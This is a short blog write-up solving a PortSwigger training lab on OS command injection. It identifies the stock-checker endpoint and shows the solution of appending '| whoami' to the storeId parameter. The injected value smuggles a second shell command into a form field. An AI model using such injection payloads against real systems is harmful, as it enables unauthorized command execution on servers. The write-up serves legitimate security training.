PortSwigger - Command Injection - Lab 1

Posted Jul 7, 2024 Updated Oct 26, 2024

By Jaco Zwarts 1 min read

Lab 1 - OS Command Injection - Simple Case

Lab Objective:

This lab contains an OS command injection vulnerability in the product stock checker. The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response. To solve the lab, execute the whoami command to determine the name of the current user.

Reference:
Port Swigger - Lab 1
Rana Khalil - Lab 1

Solution

1. Take note of all possible endpoint calls that accepts user input from the UI:

GET /product?productId=1

POST /product/stock 
body: productId=1&storeId=1

2. Append | whoami to POST /product/stock storeId parameter

product=1&storeId = 1 | whoami

PortSwigger

command-injection bscp

This post is licensed under CC BY 4.0 by the author.

Lab 1 - OS Command Injection - Simple Case

Solution

1. Take note of all possible endpoint calls that accepts user input from the UI:

2. Append | whoami to POST /product/stock storeId parameter

Trending Tags